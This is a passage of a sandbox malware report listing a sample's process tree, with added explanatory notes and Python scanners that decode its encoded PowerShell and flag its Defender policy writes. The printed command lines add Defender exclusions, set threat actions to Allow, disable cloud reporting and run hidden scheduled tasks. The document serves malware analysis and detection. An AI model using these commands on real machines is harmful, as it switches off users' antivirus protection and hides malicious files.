C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4064
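The -EncodedCommand blob in this powershell.EXE launch is the same one the "gpYZgDThj" task carried in its /TR argument above; the task fired, PowerShell ran it, and the gpupdate.exe /force child under this process is what it decodes to, a forced policy refresh issued right after the Defender policy keys were written. The encoding is base64 over the UTF-16LE bytes of the script text, which is why a plain base64 decode shows NUL bytes between every letter. Added example, not part of the Triage report and not the sample's code: a Python function that pulls such a payload out of a command line (whether it sits in a direct PowerShell invocation or nested inside a schtasks /TR argument), decodes it, and lists which of a few fragments it contains. The INTERESTING list is this example's own choice of fragments.

```python
import base64
import re

# Command lines copied from the report: the /TR argument of the one-shot
# "gpYZgDThj" task and the later top-level powershell.EXE launch. The third
# line is the unencoded powershell call from the NbuyrFd.exe subtree, kept as
# a negative case so the scanner is exercised on a line with no payload.
SAMPLE_COMMAND_LINES = [
    'schtasks /CREATE /TN "gpYZgDThj" /SC once /ST 07:50:12 /F /RU "Admin" /TR '
    '"powershell -WindowStyle Hidden -EncodedCommand '
    'cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden '
    '-EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32"',
]

# -EncodedCommand and its documented short forms -ec and -e (PowerShell also
# accepts other unambiguous prefixes such as -enc). The payload itself is a
# run of base64 characters with no whitespace.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 over the UTF-16LE encoding of the script."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def find_encoded_commands(command_lines):
    """Return (command line, decoded script) for every encoded payload found."""
    hits = []
    for line in command_lines:
        for m in _ENC_RE.finditer(line):
            try:
                hits.append((line, decode_encoded_command(m.group(1))))
            except (ValueError, UnicodeDecodeError):
                continue  # not a well-formed payload; a real scanner would log it
    return hits


# Fragments worth surfacing from a decoded script, checked case-insensitively.
# This list is the example's own choice, not a vendor rule set.
INTERESTING = (
    "start-process",
    "-windowstyle hidden",
    "gpupdate",
    "invoke-expression",
    "downloadstring",
    "frombase64string",
)


def summarize(decoded):
    """Which INTERESTING fragments a decoded script contains, in list order."""
    low = decoded.lower()
    return [frag for frag in INTERESTING if frag in low]


if __name__ == "__main__":
    for line, script in find_encoded_commands(SAMPLE_COMMAND_LINES):
        print(f"{line[:60]}... -> {script!r} {summarize(script)}")
```

Both report lines decode to `start-process -WindowStyle Hidden gpupdate.exe /force`. When reproducing this by hand, decode to UTF-16LE explicitly; decoding the bytes as UTF-8 or ASCII gives the letters interleaved with NULs and string searches on the result fail silently.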
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3120
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:764
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:800
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:3988
C:\ProgramData\Mslprojector\WlndowsDraiver-Ver2.5.5.8.exeC:\ProgramData\Mslprojector\WlndowsDraiver-Ver2.5.5.8.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4852
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 4424 -ip 44241⤵PID:1864
C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\UxpymuaMygfozov\NbuyrFd.exeC:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\UxpymuaMygfozov\NbuyrFd.exe kl /site_id 385107 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:2180
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4616
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4336
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2012
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2336
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4620
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3536
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2644
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4708
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3572
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4480
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1084
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4356
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5104
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4552
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3284
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4192
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4292
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4688
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:924
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4472
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3140
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1040
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3824
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3744
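Every reg.exe line under NbuyrFd.exe, and the forfiles-wrapped pair under Install.exe earlier in the tree, writes beneath HKLM\SOFTWARE\Policies\Microsoft\Windows Defender, the Group Policy location Defender reads its managed settings from: an "exe" entry under Exclusions\Extensions, SpyNetReporting=0 under Spynet (cloud reporting off), ThreatIDDefaultAction=6 (Allow) for each listed threat ID, and Exclusions\Paths entries for the sample's drop directories. Each value is written twice, once with /reg:32 and once with /reg:64, so it is present in both registry views, and the first batch is launched through `forfiles /p c:\windows\system32 /m cmd.exe /c "..."`, which makes cmd.exe run the quoted string so that forfiles.exe, not the installer, is the visible parent. The scanner below is an added example, not part of the Triage report and not the sample's code: it recognizes the forfiles proxy launch and classifies each Defender policy write from the command line alone. The finding labels are this example's own.

```python
import re
from dataclasses import dataclass

# Command lines copied from the report: the forfiles launcher under Install.exe,
# with its two chained REG ADD commands, and reg.exe children from both the
# Install.exe and NbuyrFd.exe branches. The last line is a constructed benign
# write, included so the scanner is seen ignoring it.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EqfDIhLUOuAU2" /t REG_DWORD /d 0 /reg:32',
    r'reg add "HKCU\Software\ExampleVendor\ExampleApp" /v Theme /t REG_SZ /d dark /f',
]

# Whitespace split that keeps "quoted strings" (including \" escapes) as one token.
_TOKEN_RE = re.compile(r'"(?:\\"|[^"])*"|\S+')


def tokenize(cmdline):
    return [t.strip('"') for t in _TOKEN_RE.findall(cmdline)]


@dataclass
class RegWrite:
    key: str
    value: str
    data: str
    view: str  # "32", "64", or "" when no /reg: switch was given


def parse_reg_add(cmdline):
    """Parse `reg ADD <key> /v <name> /t <type> /d <data> [/reg:32|64]`; None otherwise."""
    toks = tokenize(cmdline)
    for i, t in enumerate(toks):
        prev = toks[i - 1].lower().rsplit("\\", 1)[-1] if i else ""
        if t.lower() == "add" and prev in ("reg", "reg.exe"):
            break
    else:
        return None
    key = toks[i + 1] if i + 1 < len(toks) else ""
    value = data = view = ""
    j = i + 2
    while j < len(toks):
        t = toks[j].lower()
        if t == "/v" and j + 1 < len(toks):
            value, j = toks[j + 1], j + 2
        elif t == "/d" and j + 1 < len(toks):
            data, j = toks[j + 1], j + 2
        else:
            if t.startswith("/reg:"):
                view = t[5:]
            j += 1
    return RegWrite(key, value, data, view)


# Defender reads its managed (Group Policy) settings from this key.
DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"


def classify_defender_write(w):
    """Map a write under the Defender policy key to a finding; None if it is elsewhere."""
    key = w.key.lower().replace("hkey_local_machine", "hklm", 1)
    if not key.startswith(DEFENDER_POLICY):
        return None
    sub = key[len(DEFENDER_POLICY):].strip("\\")
    if sub == r"exclusions\extensions":
        return ("exclusion_extension", w.value)
    if sub == r"exclusions\paths":
        return ("exclusion_path", w.value)
    if sub == "spynet" and w.value.lower() == "spynetreporting" and w.data == "0":
        return ("cloud_reporting_off", w.value)
    if sub == r"threats\threatiddefaultaction":
        # Action 6 is "Allow": Defender is told to do nothing about that threat ID.
        kind = "threat_default_action_allow" if w.data == "6" else "threat_default_action_other"
        return (kind, w.value)
    return ("defender_policy_other", sub)


def scan(command_lines):
    """Findings, in input order, for forfiles proxy launches and Defender policy writes."""
    findings = []
    for line in command_lines:
        toks = tokenize(line)
        if not toks:
            continue
        exe = toks[0].lower().rsplit("\\", 1)[-1]
        if exe in ("forfiles", "forfiles.exe") and "/c" in (t.lower() for t in toks):
            # The command to look at is the one nested in the /c argument.
            nested = len(re.findall(r"(?i)\breg\s+add\b", line))
            findings.append(("forfiles_proxy_exec", f"{nested} nested REG ADD"))
            continue
        write = parse_reg_add(line)
        if write is not None:
            finding = classify_defender_write(write)
            if finding is not None:
                findings.append(finding)
    return findings
```

Whether these writes actually change Defender's behaviour on a given machine depends on tamper protection and on how the device is managed; for detection that does not matter, because no installer or user workflow writes under the Defender policy key from a process in a Temp directory, and the write itself is the signal. The threat IDs in the value names are left as opaque identifiers here; nothing on this page says what detections they correspond to.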
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EqfDIhLUOuAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EqfDIhLUOuAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWqLCKNYOCKLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWqLCKNYOCKLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sDZzDwaoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sDZzDwaoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zFCBYkQYpDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zFCBYkQYpDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\tcytjYddvuQvqLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\tcytjYddvuQvqLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 
\"C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MJuhmGroQWBIVyTj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MJuhmGroQWBIVyTj\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EqfDIhLUOuAU2" /t REG_DWORD /d 0 /reg:323⤵PID:3772
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EqfDIhLUOuAU2" /t REG_DWORD /d 0 /reg:324⤵PID:1148
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EqfDIhLUOuAU2" /t REG_DWORD /d 0 /reg:643⤵PID:1248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR" /t REG_DWORD /d 0 /reg:323⤵PID:3356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR" /t REG_DWORD /d 0 /reg:643⤵PID:3912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWqLCKNYOCKLC" /t REG_DWORD /d 0 /reg:323⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWqLCKNYOCKLC" /t REG_DWORD /d 0 /reg:643⤵PID:4512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sDZzDwaoU" /t REG_DWORD /d 0 /reg:323⤵PID:4812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sDZzDwaoU" /t REG_DWORD /d 0 /reg:643⤵PID:216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zFCBYkQYpDUn" /t REG_DWORD /d 0 /reg:323⤵PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zFCBYkQYpDUn" /t REG_DWORD /d 0 /reg:643⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\tcytjYddvuQvqLVB /t REG_DWORD /d 0 /reg:323⤵PID:1332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\tcytjYddvuQvqLVB /t REG_DWORD /d 0 /reg:643⤵PID:4576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA /t REG_DWORD /d 0 /reg:323⤵PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FomiwILaecWgGNOLA /t REG_DWORD /d 0 /reg:643⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MJuhmGroQWBIVyTj /t REG_DWORD /d 0 /reg:323⤵PID:5068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MJuhmGroQWBIVyTj /t REG_DWORD /d 0 /reg:643⤵PID:392
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAYWYWifK" /SC once /ST 18:01:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAYWYWifK"2⤵PID:2132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAYWYWifK"2⤵PID:1532
-
-
